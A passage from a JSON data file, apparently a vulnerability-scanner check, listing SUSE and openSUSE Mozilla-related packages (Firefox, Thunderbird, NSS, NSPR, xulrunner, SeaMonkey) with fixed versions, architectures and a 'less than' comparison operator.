{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.0.1-4.3.1", "arch": "i586", "packageFilename": "enigmail-1.0.1-4.3.1.i586.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-irc-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ia64", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.ia64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-js192-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "s390x", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.s390x.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-x86-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-translations-other-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-js192-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", 